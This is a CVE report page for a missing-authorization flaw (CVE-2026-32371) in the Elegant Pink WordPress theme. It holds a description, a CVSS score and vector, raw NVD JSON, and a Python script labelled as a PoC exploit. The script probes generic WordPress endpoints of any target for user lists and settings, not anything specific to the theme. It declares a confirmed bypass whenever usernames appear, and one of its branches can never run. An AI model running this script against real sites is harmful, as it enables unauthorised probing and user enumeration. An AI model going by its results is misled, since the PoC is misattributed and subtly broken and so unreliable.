Security Vulnerability Report
中文
CVE-2026-32371 CVSS 5.3 MEDIUM

CVE-2026-32371

Published: 2026-03-13 19:54:52
Last Modified: 2026-04-22 21:30:26

Description

Missing Authorization vulnerability in raratheme Elegant Pink elegant-pink allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Elegant Pink: from n/a through <= 1.3.3.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

raratheme Elegant Pink Theme <= 1.3.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-32371 PoC - Elegant Pink Theme Authorization Bypass # Target: WordPress site with Elegant Pink theme <= 1.3.3 # Note: This PoC demonstrates the access control vulnerability import requests import sys def check_vulnerability(target_url): """ Check if target is vulnerable to CVE-2026-32371 Missing Authorization in Elegant Pink theme """ # Common endpoints that might be affected endpoints = [ f"{target_url}/wp-admin/admin-ajax.php", f"{target_url}/wp-json/wp/v2/settings", f"{target_url}/?rest_route=/wp/v2/users" ] headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Content-Type': 'application/x-www-form-urlencoded' } print(f"[*] Testing target: {target_url}") print(f"[*] CVE-2026-32371 - Missing Authorization in Elegant Pink Theme\n") for endpoint in endpoints: try: response = requests.get(endpoint, headers=headers, timeout=10) # Check for unauthorized access success indicators if response.status_code == 200: if 'username' in response.text.lower() or 'user_login' in response.text: print(f"[!] VULNERABLE: {endpoint}") print(f"[+] Response contains user data - authorization bypass confirmed") print(f"[+] Status Code: {response.status_code}") return True elif response.status_code == 200 and 'settings' in endpoint: print(f"[!] POTENTIALLY VULNERABLE: {endpoint}") print(f"[+] Site settings accessible without auth") return True except requests.RequestException as e: print(f"[-] Error testing {endpoint}: {e}") print("[*] No obvious vulnerability indicators found") print("[*] Manual verification recommended") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2026-32371-poc.py <target_url>") print("Example: python cve-2026-32371-poc.py http://example.com") sys.exit(1) target = sys.argv[1].rstrip('/') check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32371", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:51.547", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in raratheme Elegant Pink elegant-pink allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Elegant Pink: from n/a through <= 1.3.3."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en raratheme Elegant Pink elegant-pink permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Elegant Pink: desde n/a hasta &lt;= 1.3.3."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/elegant-pink/vulnerability/wordpress-elegant-pink-theme-1-3-3-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}